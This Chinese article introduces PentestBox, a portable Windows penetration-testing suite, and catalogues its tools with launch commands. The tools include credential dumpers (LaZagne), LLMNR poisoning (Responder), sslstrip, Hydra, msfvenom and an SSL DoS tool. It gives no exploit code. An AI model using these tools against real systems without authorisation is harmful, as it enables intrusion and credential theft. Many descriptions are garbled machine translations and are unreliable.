1、pentestbox簡介
Pentest Box是一款Windows平臺下預配置的便攜式開源滲透測試環境,而它也是著名黑客Kapustkiy常用的工具之一。
在安全測試的過程中,大部分腳本工具都是基于Linux平臺運行,比如bash、cat、chmod、curl、git、gzip、ls、mv、ps、 ssh、sh、uname等。Linux相比windows,安裝和更新軟件更加高效,排除故障更加方便和穩定。windows窗口化界面操作和特殊工具 的兼容性,也導致大部分安全人員嚴重依賴于windows系統,因此使用windows的安全測試人員大部分都會在虛擬機內運行各式各樣的Linux操作 系統。
但是虛擬機運行Linux也有相對應的缺點,首先是內存占用過高,其次是操作沒有那么方便。基于以上問題,Pentest Box被開發出來了。
2、pentestbox優點
2.1、易于使用
Pentest Box和Linux有些相似,可以完全依靠命令行工具進行使用,這點很符合Linux和Mac OS發燒友的口味。
2.2、設計簡潔
整個Pentest從安裝到使用非常簡潔,就靠一個exe文件來啟動,并且安裝也是一鍵式安裝。除了安裝目錄以外,沒有多余的地方需要設置。
2.3、性能卓越
和虛擬機相比,Pentest Box完全運行于Windows系統上,不依賴任何虛擬系統,有著更加強悍的性能。
2.4、沒有依賴需求
如果我們要在windows上使用SQLMAP或者metasploit之類的工具,可能需要安裝各種各樣的語言環境,比如python,ruby,php,Java等。但是所有的依賴需求都已經安裝在Pentest Box內部,你無需再去安裝任何環境,設置任何環境變量等。
2.5、方便攜帶
Pentest Box不需要安裝注冊表,不需要特別的驅動,因此有極強的攜帶性,可以直接拷貝到U盤內運行。
2.6、Linux 工具集
Pentest Box工具包內含有各式各樣的Linux工具,包括但不限于bash、cat、chmod、curl、git、gzip、ls、mv、ps、ssh、sh、uname等,它甚至包含了Linux編輯神器 “vim”。
2.7、無驅動問題
在VM中運行Linux最頭疼的主要是驅動兼容問題,就算有VM TOOL的支持,有時候也會爆出各種各樣的bug。但是在Pentest Box無需擔心這個問題。只要windows內安裝了相關驅動,就沒必要再去考慮驅動問題。
2.8、模塊化
雖然Pentest Box已經集成了非常多優秀的Linux工具,但是你依然可以自定義添加自己的模塊。Pentest Box中的toolsmanager可以對Pentest Box內部的工具進行更新,卸載和安裝。
2.9、更少的內存占用
一般情況下,在虛擬機中運行Linux系統可能需要2GB的內存,但是在Pentest Box中只需要20MB的內存。
2.10、更少的磁盤占用
我安裝完帶MSF的Pentest Box,大約占用了4.5GB的硬盤,而我安裝完Kali Linux 64位的VM后則占用了20多GB的硬盤。可見相對于虛擬機Linux來說,Pentest Box占用更小的空間。
2.11、內置瀏覽器
Pentest Box中內置一個Firefox瀏覽器,并且已經安裝好優秀的安全測試插件。測試插件的列表我等等會在下方寫出來。
2.12、可更新特性
雖然Pentest Box中的toolsmanager功能可以對腳本進行更新,但是Pentest Box依然有自己的更新指令,可以對框架,配置文件,環境等進行更新。
2.13、易于分享
正如我所說,Pentest Box有著優秀的攜帶性,因此它還可以安裝在云端,達到一個多人共用協作的功能,比如dropbox,百度云盤,google云盤等。
2.14、32位和64位系統支持
大部分工具可能并不太會關心windows 32位的兼容性,但是Pentest Box可以完美兼容32位和64位的windows系統。Pentest Box的開發人員已經在ASUS X205TA(售價200美元的低配電腦)上以windows 32位系統完美運行Pentest Box。
3、安裝與使用
下載安裝,Pentest Box官方下載頁面:
安裝也沒什么復雜的,隨便安裝再哪個磁盤都可以,你安裝在Dropbox或者百度云盤內都沒問題。但是下載的時候注意了,下載選項上有兩個選項,一個是包含Metasploit的,一個是未包含Metasploit的。這里根據大家的需求來選擇下載。
pentestbox更新:
pentestbox相關鏈接
4、工具詳情與說明
4.1、Web漏洞掃描器
Burp Suite
是用于攻擊web 應用程序的集成平臺。它包含了許多工具,并為這些工具設計了許多接口,以促進加快攻擊應用程序的過程。
所有的工具都共享一個能處理并顯示HTTP 消息,持久性,認證,代理,日志,警報的一個強大的可擴展的框架。
C:\Users\Demon\Desktop >burpsuite
Commix
有一個簡單的環境,它可以被使用,從web開發人員,滲透測試人員甚至安全研究人員測試web應用程序的視圖找到錯誤,錯誤或漏洞相關命令注入攻擊。
C:\Users\Demon\Desktop >commix
dotdotpwn
這是一個非常靈活的智能fuzzer發現遍歷目錄等軟件的漏洞HTTP / FTP / TFTP服務器,網絡平臺如cms,erp,博客,等等。
C:\Users\Demon\Desktop >dotdotpwn
fimap
fimap有點python工具可以找到,準備、審計、利用甚至谷歌自動在webapps本地和遠程文件包含漏洞。fimap應該像sqlmap LFI / RFI代替sql注入漏洞。這是目前正在發展但它是可用的。
C:\Users\Demon\Desktop >fimap
Golismero
GoLismero安全性測試的是一個開源框架。這是目前針對網絡安全,但它可以很容易地擴展到其他類型的掃描。
C:\Users\Demon\Desktop >golismero
jSQL
jSQL注入是一個輕量級應用程序用于查找數據庫信息從一個遙遠的服務器。jSQL是免費的,開放源碼和跨平臺(Windows、Linux、Mac OS X、Solaris)。
C:\Users\Demon\Desktop >jSQL
Nikto
Nikto是一個開源的web服務器(GPL)掃描儀對web服務器執行全面測試多個項目,包括超過6700個有潛在危險的文件/程序,檢查超過1250臺服務器的過時的版本,和版本超過270服務器上的具體問題。
C:\Users\Demon\Desktop >nikto
PadBuster
自動化腳本執行Padding Oracle的攻擊。
C:\Users\Demon\Desktop >padbuster
SqlMap
sqlmap是一個開源的滲透測試工具,自動檢測和利用SQL注入漏洞的過程和接管的數據庫服務器。它有一個強大的檢測引擎,許多細分功能的最終滲透試驗器和廣泛的開關持續指紋數據庫,從數據庫獲取數據,訪問底層文件系統和操作系統上執行命令通過帶外連接。
C:\Users\Demon\Desktop >sqlmap
Vega
Vega 是一個免費和開源的掃描儀和測試平臺,測試web應用程序的安全。織女星可以幫助你找到并驗證SQL注入、跨站腳本(XSS),不經意間透露敏感信息,和其他漏洞。它是用Java編寫的,基于GUI的,運行在Linux上,OS X和窗戶。
C:\Users\Demon\Desktop >vega
Wpscan
WPScan是一個黑盒WordPress漏洞掃描器,可以用來掃描遠程WordPress安裝發現安全問題。
C:\Users\Demon\Desktop >wpscan
Yasuo
Yasuo是一個ruby腳本掃描脆弱的第三方web應用程序。工作時在網絡安全評估(內部、外部redteam演出等),我們經常碰到脆弱的第三方web應用程序或web前端,讓我們妥協遠程服務器利用公開已知的漏洞。一些常見的和最喜歡的Apache Tomcat應用程序管理界面,JBoss jmx控制臺
C:\Users\Demon\Desktop >yasuo
Zaproxy
OWASP Zed攻擊代理(攻擊)是一個易于使用的綜合滲透測試工具在web應用程序中尋找漏洞。是設計用于與廣泛的安全經驗的人,因此是理想的開發和功能測試人員是滲透測試作為一個有用的補充有經驗的筆測試人員工具箱。
C:\Users\Demon\Desktop >zap
4.2、Web應用程序代理
Burp Suite
Burp Suite是一個集成的平臺進行安全性測試的web應用程序。它的各種工具無縫地協同工作,以支持整個測試過程,從最初的映射和分析應用程序的攻擊表面,通過尋找和利用安全漏洞。
C:\Users\Demon\Desktop >burpsuite
Zaproxy
OWASP Zed攻擊代理(攻擊)是一個易于使用的綜合滲透測試工具在web應用程序中尋找漏洞。是設計用于與廣泛的安全經驗的人,因此是理想的開發和功能測試人員是滲透測試作為一個有用的補充有經驗的筆測試人員工具箱。
C:\Users\Demon\Desktop >zap
4.3、CMS漏洞掃描器
CMSmap
CMSmap python開源CMS掃描,自動檢測安全漏洞的過程中最受歡迎的CMS。CMSmap的主要目的是為不同類型的cms集成常見漏洞在一個單一的工具。
C:\Users\Demon\Desktop >cmsmap
droopescan
基于插件的掃描儀,幫助安全研究人員識別問題
Drupal。
SilverStripe
Wordpress
C:\Users\Demon\Desktop >droopescan
OWASP
Joomla漏洞掃描器——Joomla!它可能是最廣泛使用的CMS,由于其靈活性,用戶友好性,可擴展性命名一些。因此,觀察其漏洞,并添加像KB這樣的漏洞到Joomla掃描器需要持續的活動。它將幫助Web開發人員和Web 大師幫助識別他們部署的Joomla可能的安全弱點! 網站。 沒有Web安全掃描程序僅專用于一個CMS。
C:\Users\Demon\Desktop >joomscan
Wpscan
WPScan是一個黑盒WordPress漏洞掃描器,可以用來掃描遠程WordPress安裝發現安全問題。
C:\Users\Demon\Desktop >wpscan
VbScan
VBScan perl編程語言是一個開源項目的檢測鏈入頁面CMS漏洞和分析。
C:\Users\Demon\Desktop >vbscan
4.4、網絡爬蟲程序
DirBuster——DirBuster是一個多線程java應用程序,旨在強制在Web /應用程序服務器上強制目錄和文件名。
作者:OWASP.org
許可:Apache 2.0
C:\Users\Demon\Desktop >dirbuster
Burp Suite
Burp Suite 是一個集成的平臺進行安全性測試的web應用程序。它的各種工具無縫地協同工作,以支持整個測試過程,從最初的映射和分析應用程序的攻擊表面,通過尋找和利用安全漏洞。
作者:Portswigger
C:\Users\Demon\Desktop >burpsuite
4.5、信息收集
Angry IP Scanner
Angry IP Scanner (或者只是ipscan)是一個開源和跨平臺的網絡掃描器設計為快速和易于使用。它掃描IP地址和端口,以及許多其他功能。人們普遍使用的網絡管理員,只是好奇的世界各地的用戶,包括大型和小型企業、銀行和政府機構。
C:\Users\Demon\Desktop >ipscan
dnsrecon
DNS枚舉腳本
許可:GPLv2
C:\Users\Demon\Desktop >dnsrecon
Golismero
GoLismero安全性測試的是一個開源框架。這是目前針對網絡安全,但它可以很容易地擴展到其他類型的掃描。
許可:GPLv2
C:\Users\Demon\Desktop >golismero
Instarecon
自動化的基本數字偵察。偉大的目標獲得最初的足跡,發現額外的子域。InstaRecon會做的事:
DNS(直接、PTR MX,NS)查找
域名查詢服務(域和IP)查找
谷歌在搜索的子域狗屁不是
Shodan查找
在整個cidr反向DNS查找
許可:麻省理工學院的許可
C:\Users\Demon\Desktop >instarecon
Nmap
Nmap(“網絡映射器”)是一個免費和開源(許可證)實用程序用于網絡發現和安全審計。許多系統和網絡管理員也發現它有用的任務,比如網絡庫存,管理服 務升級計劃,和監控主機或服務正常運行時間。Nmap使用原始IP數據包在小說方面來確定網絡上的主機可用,哪些服務(應用程序名稱和版本)提供這些主 機,操作系統(OS版本)他們正在運行,什么類型的數據包過濾器/防火墻正在使用,和幾十個其他的特征。它旨在快速掃描大型網絡,但對單一主機工作正常。 Nmap運行在所有主要的電腦操作系統,和官方二進制包可供Linux,Windows,和Mac OS x除了經典Nmap命令行可執行文件,Nmap套件包括一個先進的GUI和結果查看器(Zenmap),一個靈活的數據傳輸,重定向,和調試工具 (Ncat),比較掃描結果的一個實用程序(Ndiff)和數據包生成和響應分析工具(np)。
許可:GPLv2
為了使用Nmap,你需要首先安裝WinPcap包捕獲庫,可以從Winpcap.org下載。
cmd.exe C:\Users\Demon\Desktop >nmap cmd.exe C:\Users\Demon\Desktop >ncat cmd.exe C:\Users\Demon\Desktop >ndiff cmd.exe C:\Users\Demon\Desktop >nping
Responder
Responder 是一個LLMNR NBT-NS和mdn投毒者,內置HTTP / SMB /該軟件/ FTP / LDAP流氓身份驗證服務器支持NTLMv1 / NTLMv2 / LMv2,延長安全NTLMSSP和HTTP基本身份驗證。
作者:SpiderLabs
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >responder
SnmpWalk
SnmpWalk允許你檢測一組變量可用于某一設備上閱讀。你可以獲得一個完整的列表或部分。通過分析網絡設備掃描獲得的結果使用SnmpWalk可以開發一個支持的mib列表,通過這種方式,獲得完整的描述變量和可能的值。
作者:SnmpSoft公司
cmd.exe C:\Users\Demon\Desktop >snmpwalk
SpiderFoot
SpiderFoot是一個開源情報自動化工具。它的目標是實現自動化的過程對給定目標收集情報,這可能是一個IP地址,域名、主機名或網絡子網。 SpiderFoot可以用來進攻,即作為黑盒的一部分滲透測試收集的信息目標或防守來識別你的組織是免費提供什么信息對你攻擊者使用。
cmd.exe C:\Users\Demon\Desktop >spiderfoot
TestSSLServer
TestSSLServer是一個簡單的命令行工具,聯系一個SSL / TLS服務器(名稱和端口給出參數),獲得一些信息。
作者:托馬斯Pornin
cmd.exe C:\Users\Demon\Desktop >testsslserver
SSlStrip
它將透明地劫持HTTP交通網絡上,注意HTTPS連接和重定向,然后這些鏈接映射到類似的HTTP鏈接或homograph-similar HTTPS連接。它還支持模式提供一個看起來像一個鎖圖標標識,選擇性伐木、否認和會話。
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >sslstrip
SSLyze
SSLyze是一個Python工具,可以分析一個服務器的SSL配置連接到它。設計為快速和全面的,應該幫助組織和測試人員識別SSL服務器配置錯誤影響他們。
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >sslyze
SSLScan
SSLScan測試SSL / TLS啟用服務發現支持密碼套件。
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >sslscan
Sublist3r
Sublist3r是python工具,旨在列舉子域的網站使用搜索引擎。它有助于滲透測試和bug獵人收集和收集他們的目標域的子域。 Sublist3r目前支持以下搜索引擎:谷歌,雅虎,必應,百度,問。更多的搜索引擎可能被添加在未來。使用Netcraft和DNSdumpster Sublist3r也收集子域。
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >sublist3r
Subbrute
SubBrute是一個社區驅動的項目的目標創造最快的和最精確的子域名枚舉的工具。背后的一些魔法SubBrute是它使用解析器作為一種開放代理繞過DNS病原。這個設計還提供了一層匿名,SubBrute不直接發送交通目標的名字服務器。
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >subbrute
Tekdefense
Automater-自動化是一個URL /域名,IP地址和Md5 hash OSINT工具旨在使分析過程更容易入侵分析師。給定一個目標(URL、IP或散列)或一個文件全自動化目標將返回相關的結果來源如 下:IPvoid.com,Robtex.com,Fortiguard.com,unshorten。 我,Urlvoid.com,Labs.alienvault.com,ThreatExpert VxVault,VirusTotal。
作者:TekDefense.com
cmd.exe C:\Users\Demon\Desktop >automater
UrlCrazy
生成和測試域輸入錯誤和變化檢測和執行錯誤蹲,URL劫持,釣魚,和企業間諜活動。
許可:非商業性
cmd.exe C:\Users\Demon\Desktop >urlcrazy
The Harvester
The Harvester 電子郵件帳戶,子域名名稱、虛擬主機、開放端口/橫幅,和員工的名字從不同的公共資源(搜索引擎,pgp關鍵服務器)。
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >theharvester
Wireshark
Wireshark是世界上最重要的網絡協議分析儀。它讓你看到發生了什么在您的網絡在微觀水平。這是事實上的標準(通常法理)在許多行業和教育機構。Wireshark發展繁榮的貢獻全球網絡專家。
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >wireshark
4.6、開發工具
Beef Project
beef是瀏覽器開發框架。這是一個滲透測試工具,它關注的是web瀏覽器。
作者:Wade Alcorn
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >beefproject
CrackMapExec
其中的瑞士軍刀Windows /活動目錄環境。
多虧了托馬斯。編譯的版本。
作者:byt3bl33d3r
cmd.exe C:\Users\Demon\Desktop >crackmapexec
Metasploit
Framework——世界上最好用滲透測試框架。
作者:Rapid7
許可:BSD 3條款許可協議
請注意PentestBox的有兩個版本,一個與Metasploit Metasploit和另一個。如果沒有完成下載Metasploit變體在這里。
cmd.exe C:\Users\Demon\Desktop cmd.exe C:\Users\Demon\Desktop >msfvenom cmd.exe C:\Users\Demon\Desktop >msfelfscan cmd.exe C:\Users\Demon\Desktop >msfbinscan cmd.exe C:\Users\Demon\Desktop >msfpescan cmd.exe C:\Users\Demon\Desktop >msfd cmd.exe C:\Users\Demon\Desktop >msfmachscan
SqlMap
sqlmap是一個開源的滲透測試工具,自動檢測和利用SQL注入漏洞的過程和接管的數據庫服務器。它有一個強大的檢測引擎,許多細分功能的最終滲透試驗器和廣泛的開關持續指紋數據庫,從數據庫獲取數據,訪問底層文件系統和操作系統上執行命令通過帶外連接。
作者:Miroslav Stampar Bernardo Damele Assumpcao吉馬良斯
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop
4.7、密碼破解
Burp Suite
Burp Suite是一個集成的平臺進行安全性測試的web應用程序。它的各種工具無縫地協同工作,以支持整個測試過程,從最初的映射和分析應用程序的攻擊表面,通過尋找和利用安全漏洞。
cmd.exe C:\Users\Demon\Desktop >burpsuite
Findmyhash
findmyhash。py嘗試不同類型的裂縫散列使用免費的在線服務。
作者:JulGor
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >findmyhash
HashIdentifier
軟件來識別不同類型的散列加密數據,尤其是密碼使用。
作者:Zion3R
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >hashidentifier
Hashcat
Hashcat是世界上最快的CPU-based密碼恢復工具。
許可證
cmd.exe C:\Users\Demon\Desktop >hashcat-cli32 cmd.exe C:\Users\Demon\Desktop >hashcat-cli64 cmd.exe C:\Users\Demon\Desktop >hashcat-cliXOP
LaZagne
LaZagne項目是一個開放源碼應用程序用于檢索大量的密碼存儲在本地計算機。每個軟件存儲密碼使用不同的技術(明文、api、自定義算法、數據庫 等)。這個工具已經開發為目的的找到這些密碼為最常用的軟件。這時,它支持22個項目在使用微軟的Windows操作系統和12在Linux /類unix操作系統。
作者:AlessandroZ
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >lazagne
John the Ripper
John the Ripper是一個快速密碼餅干,目前對于許多風格的Unix,窗戶,DOS,BeOS和OpenVMS。它的主要目的是檢測弱Unix密碼。除了在各種Unix系統上最常見的幾種crypt(3)密碼哈希類型,支持開箱即用的是Windows LM hash,以及社區增強版本中的大量其他哈希和密碼。
cmd.exe C:\Users\Demon\Desktop >johntheripper
Patator
Patator是出于對使用Hydra,Medusa,Ncrack,Metasploit模塊和Nmap NSE腳本的密碼猜測攻擊的挫折。我選擇了不同的方法,以便不創建另一個暴力的工具,并避免重復相同的缺點。 Patator是一個用Python編寫的多線程工具,力求比其他前輩更可靠和更靈活。
作者:Sebastien MACKE
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >patator
RainbowCrack
RainbowCrack是Philippe Oechslin更快的時間存儲器權衡技術的一般建議實現。 它裂紋散列與彩虹表.RainbowCrack使用時間內存權衡算法來破解哈希。它不同于強力哈希餅干。強力哈希餅干生成所有可能的明文,并在飛行中計算相應的哈希,然后將哈希與要破解的哈希進行比較。一旦找到匹配,找到明文。 如果所有可能的明文都被測試并且沒有找到匹配,則找不到明文。利用這種類型的散列破解,丟棄所有中間計算結果。
作者:RainbowCrack項目
cmd.exe C:\Users\Demon\Desktop >rcrack cmd.exe C:\Users\Demon\Desktop >rt2rtc cmd.exe C:\Users\Demon\Desktop >rtgen cmd.exe C:\Users\Demon\Desktop >rtsort cmd.exe C:\Users\Demon\Desktop >rcrack_cl cmd.exe C:\Users\Demon\Desktop >rcrack_cl_gui cmd.exe C:\Users\Demon\Desktop >rcrack_cuda cmd.exe C:\Users\Demon\Desktop >rcrack_cuda_gui
THC Hydra
Hydra是一個并行登錄餅干支持眾多的協議攻擊。非常快和靈活,很容易添加新的模塊。這個工具可以讓研究人員和安全顧問展示將是多么容易獲得未授權訪問遠程系統。
請注意,PentestBox包含編譯的版本THC-Hydra來自在這里.
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >hydra cmd.exe C:\Users\Demon\Desktop >pw-inspector
Zaproxy
OWASP Zed攻擊代理(攻擊)是一個易于使用的綜合滲透測試工具在web應用程序中尋找漏洞。是設計用于與廣泛的安全經驗的人,因此是理想的開發和功能測試人員是滲透測試作為一個有用的補充有經驗的筆測試人員工具箱。
作者:Simon Bennetts
cmd.exe C:\Users\Demon\Desktop >zap
4.8、安卓系統安全
AndroBugs Framework
AndroBugs Android脆弱性分析框架是一個系統,有助于開發人員或黑客在Android應用程序找到潛在的安全漏洞。沒有燦爛的GUI界面,但最有效的(平均每掃描不到2分鐘)和更準確。
作者:AndroBugs
作者:GPLv3
cmd.exe C:\Users\Demon\Desktop >androbugs
Androguard逆向工程,惡意軟件和goodware Android應用程序的分析……和更多(忍者!)
作者: Anthony Desnos
許可:Apache版本2.0
cmd.exe C:\Users\Demon\Desktop >androapkinfo cmd.exe C:\Users\Demon\Desktop >androarsc cmd.exe C:\Users\Demon\Desktop >androauto cmd.exe C:\Users\Demon\Desktop >androaxml cmd.exe C:\Users\Demon\Desktop >androcsign cmd.exe C:\Users\Demon\Desktop >androdd cmd.exe C:\Users\Demon\Desktop >androdiff cmd.exe C:\Users\Demon\Desktop >androdis cmd.exe C:\Users\Demon\Desktop >androgui
Androwarn
Androwarn是一個工具,它的主要目的是對潛在的惡意行為檢測和警告用戶開發的Android應用程序。
作者: Thomas D
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >androwarn
ApkTool
逆向工程第三方的工具,關閉,二進制Android應用程序。它可以解碼資源接近原始形式和重建后做一些修改,這使得有可能逐步調試smali代碼。還使用一個應用程序就會變得容易些,因為項目的文件結構和自動化等重復性的任務構建apk,等等。
作者:Connor Tumbleson, Ryszard Wi?niewski
許可:Apache版本
cmd.exe C:\Users\Demon\Desktop >apktool
ByteCode Viewer
反向工程第三方,封閉,二進制Android應用程序的工具。它可以將資源解碼為幾乎原始的形式,并在做出一些修改后重建它們; 它使得可以一步一步地調試smali代碼。此外,它使一個應用程序的工作更容易,因為像項目一樣的文件結構和自動化一些重復的任務,如構建apk等。
作者:konloch
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >bytecodeviewer
dex2jar
轉換。dex文件。類文件(壓縮jar)
作者:鮑勃·潘
許可:Apache版本
cmd.exe C:\Users\Demon\Desktop >d2j-dex2jar cmd.exe C:\Users\Demon\Desktop >d2j-dex2smali cmd.exe C:\Users\Demon\Desktop >d2j-jar2dex cmd.exe C:\Users\Demon\Desktop >d2j-decrypt-string
Jadx
敏捷的Java編譯器
作者:skylot
許可:Apache
cmd.exe C:\Users\Demon\Desktop >jadx cmd.exe C:\Users\Demon\Desktop >jadx-gui
JD-GUI
JD-GUI是一個獨立的圖形工具顯示的Java源代碼”。階級”文件。你可以瀏覽重建源代碼JD-GUI即時訪問方法和字段。
許可:免費非商業用途
cmd.exe C:\Users\Demon\Desktop >jd-gui
Pidcat
彩色logcat腳本,只顯示了一個特定的應用程序包的日志條目。
作者 Jake Wharton
cmd.exe C:\Users\Demon\Desktop >pidcat
4.9、逆向工程
ApkTool
逆向工程第三方的工具,關閉,二進制Android應用程序。它可以解碼資源接近原始形式和重建后做一些修改,這使得有可能逐步調試smali代碼。還使用一個應用程序就會變得容易些,因為項目的文件結構和自動化等重復性的任務構建apk,等等。
作者:Connor Tumbleson, Ryszard Wi?niewski
許可:Apache版本
cmd.exe C:\Users\Demon\Desktop >apktool
dex2jar
轉換。dex文件。類文件(壓縮jar)
作者:Bob Pan
許可:Apache版本
cmd.exe C:\Users\Demon\Desktop >d2j-dex2jar cmd.exe C:\Users\Demon\Desktop >d2j-dex2smali cmd.exe C:\Users\Demon\Desktop >d2j-jar2dex cmd.exe C:\Users\Demon\Desktop >d2j-decrypt-string
Jad
Jad provides提供了一個命令行用戶界面從類文件中提取源代碼。
作者: Pavel Kouznetsov
cmd.exe C:\Users\Demon\Desktop >jad
JD-GUI
JD-GUI是一個獨立的圖形工具顯示的Java源代碼”。階級”文件。你可以瀏覽重建源代碼JD-GUI即時訪問方法和字段。
許可:免費非商業用途
cmd.exe C:\Users\Demon\Desktop >jd-gui
JavaSnoop
JavaSnoop是安全工具,它允許一個方面安全測試人員輕松地測試Java應用程序的安全。
作者:www.aspectsecurity.com
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop
OllyDbg
OllyDbg 32位匯編級別分析調試器為Microsoft?Windows?
作者:Oleh pokalchuk Yuschuk
cmd.exe C:\Users\Demon\Desktop >ollydbg
Radare2
r2是從頭開始的重寫,以提供一組庫和工具來處理二進制文件.Radare項目作為取證工具啟動,腳本命令行十六進制編輯器能夠打開磁盤文件,但后來支持分析二進制文件,反匯編代碼,調試程序,附加到遠程gdb服務器。
cmd.exe C:\Users\Demon\Desktop >radare2
打開網絡服務器,請遵循下面。
cmd.exe C:\Users\Demon\Desktop >radare2directory C:\PentestBox\bin\ReverseEngineering\radare2 $radare2.exe - c=H rax2.exe
Smali/Baksmali
smali / baksmali是dalvik使用的dex格式的匯編/反匯編器,Android的Java VM實現。 語法是松散地基于Jasmin的/ dedexer的語法,并支持dex格式的完整功能(注釋,調試信息,行信息等)。您可以通過鍵入smali和baksmali訪問smali和baksmali
許可:BSD
cmd.exe C:\Users\Demon\Desktop >smali cmd.exe C:\Users\Demon\Desktop >baksmali
4.10、壓力測試
THC-SSL-DOS
THC-SSL-DOS工具是一個概念證明披露可疑SSL的安全工具。這工作好如果服務器支持SSL重新談判。它仍然工作如果不支持SSL重新談判,但之前需要一些修改和更多的機器人可以看到產生影響。
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop
4.11 嗅探
Burp Suite
Burp Suite 是一個集成的平臺進行安全性測試的web應用程序。它的各種工具無縫地協同工作,以支持整個測試過程,從最初的映射和分析應用程序的攻擊表面,通過尋找和利用安全漏洞。
cmd.exe C:\Users\Demon\Desktop >burpsuite
DNSChef
DNSChef是一個高度可配置DNS代理滲透測試人員和惡意軟件分析師。DNS代理(又名“假DNS”)是一個工具用于應用程序的網絡流量分析等用途。 例如,可以使用DNS代理偽造請求“badguy.com”指向一個本地機器終止或攔截,而不是一個真正的主機在互聯網上的某個地方。
作者:thesprawl
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >dnschef
Ettercap
Ettercap是一套綜合的中間人攻擊。它嗅探的實時連接,動態內容過濾和其他許多有趣的把戲。它支持主動和被動解剖的許多協議和包括許多功能網絡和主機的分析。
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >ettercap
ngrep
ngrep pcap-aware工具將允許您指定擴展正則表達式匹配的數據包有效載荷數據。
cmd.exe C:\Users\Demon\Desktop >ngrep
Network Miner
NetworkMiner可以用作被動網絡嗅探器/數據包捕獲工具,以便檢測操作系統,會話,主機名,開放端口等,而不在網絡上引入任何流量。 NetworkMiner還可以解析PCAP文件進行離線分析,并從PCAP文件重新生成/重新組合傳輸的文件和證書。
作者:NETRESEC
cmd.exe C:\Users\Demon\Desktop >networkminer
Responder
Responder 是LLMNR,NBT-NS和MDNS中毒程序,內置支持NTLMv1 / NTLMv2 / LMv2,擴展安全性NTLMSSP和基本HTTP身份驗證的HTTP / SMB / MSSQL / FTP / LDAP流氓認證服務器。
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >responder
SSlStrip
它將透明地劫持網絡上的HTTP流量,監視HTTPS鏈接和重定向,然后將這些鏈接映射到類似于HTTP的鏈接或同源圖類似的HTTPS鏈接。它還支持提供圖標的模式,看起來像一個鎖圖標,選擇性日志記錄和會話拒絕。
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >sslstrip
WinDump
WinDump tcpdump的Windows版本,UNIX命令行網絡分析儀。WinDump完全兼容tcpdump和可以用來觀察,診斷并保存到磁盤網絡流量根據各種復雜的規則。
許可:BSD
cmd.exe C:\Users\Demon\Desktop >windump
Wireshark
Wireshark – Wireshark是世界上最重要的網絡協議分析器。 它可以讓你看到你的網絡在微觀層面上發生了什么。它是許多行業和教育機構的事實上(并通常是法律上的)標準。 Wireshark的發展蓬勃發展得益于全球網絡專家的貢獻。
cmd.exe C:\Users\Demon\Desktop >wireshark
Zaproxy
OWASP Zed攻擊代理(攻擊)是一個易于使用的綜合滲透測試工具在web應用程序中尋找漏洞。是設計用于與廣泛的安全經驗的人,因此是理想的開發和功能測試人員是滲透測試作為一個有用的補充有經驗的筆測試人員工具箱。
cmd.exe C:\Users\Demon\Desktop >zap
4.12、取證工具
Bulk Extractor
bulk_extractor是一種計算機取證工具,用于掃描磁盤映像,文件或文件目錄,并提取有用信息而無需解析文件系統或文件系統結構。可以使用自動化工具輕松檢查,解析或處理結果。 bulk_extractor還創建了它找到的特征的直方圖,因為更常見的特征往往更重要。該程序可用于執法,國防,情報和網絡調查應用程序。
作者:Simson l·加芬克爾
許可:GPLv2
cmd.exe C:\Users\Demon\Desktop >bulkextractor
CapTipper
CapTipper是一個python工具,用于分析,探索和恢復HTTP惡意流量。 CapTipper設置了一個Web服務器,該服務器與PCAP文件中的服務器完全一樣,并且包含內部工具,以及一個強大的交互式控制臺,用于分析和檢查發現的主機,對象和對話。
cmd.exe C:\Users\Demon\Desktop >captipper
DumpZilla
Dumpzilla應用程序是在Python 3.x中開發的,目的是提取Firefox,Iceweasel和Seamonkey瀏覽器的所有取證有趣的信息進行分析。由于其Python 3.x開發,可能無法在舊的Python版本正常工作,主要是與某些字符。 在Unix和Windows 32/64位系統下工作。 在命令行界面中工作,所以信息轉儲可以通過管道重定向工具,如grep,awk,cut,sed …
許可:GPLv3
cmd.exe C:\Users\Demon\Desktop >dumpzilla
Loki
掃描儀的簡單指標妥協。檢測是基于四個檢測方法:
國際奧委會文件名稱:正則表達式匹配完整的文件路徑和名稱
雅苒規則檢查:雅苒簽名匹配文件內存和處理數據
哈希校驗:比較已知的惡意散列(MD5、SHA1,SHA256)和掃描文件
cmd.exe C:\Users\Demon\Desktop >loki
Make PDF Tools
make-pdf-javascript。py允許與嵌入JavaScript創建一個簡單的PDF文檔打開時將執行的PDF文檔。它本質上是mPDF膠水代碼。py模塊包含一個類方法來創建標題,間接對象,stream objects,stream objects和XREFs。
作者:/迪迪埃·史蒂文斯
cmd.exe C:\Users\Demon\Desktop >make-pdf-embedded cmd.exe C:\Users\Demon\Desktop >make-pdf-javascript
Origami
Origami是一個用于操作PDF文檔的Ruby框架。它具有PDF兼容的解析器,并允許分析,修改或創建惡意的PDF文件。 雖然它可能用于多種用途,但折紙主要用作安全工具。因此,它不專注于文檔的圖形內容,并且不包括PDF渲染器。
許可:GPL
cmd.exe C:\Users\Demon\Desktop >pdfsh
pedump
一個純ruby實現win32 PE二進制文件轉儲。
作者:zed_0xff
許可:麻省理工學院
cmd.exe C:\Users\Demon\Desktop >pedump
PDF Parser
這個工具將解析一個PDF文檔識別分析文件中使用的基本要素。它不會呈現一個PDF文檔。
作者:迪迪埃·史蒂文斯
cmd.exe C:\Users\Demon\Desktop >pdf-parser
pdfid
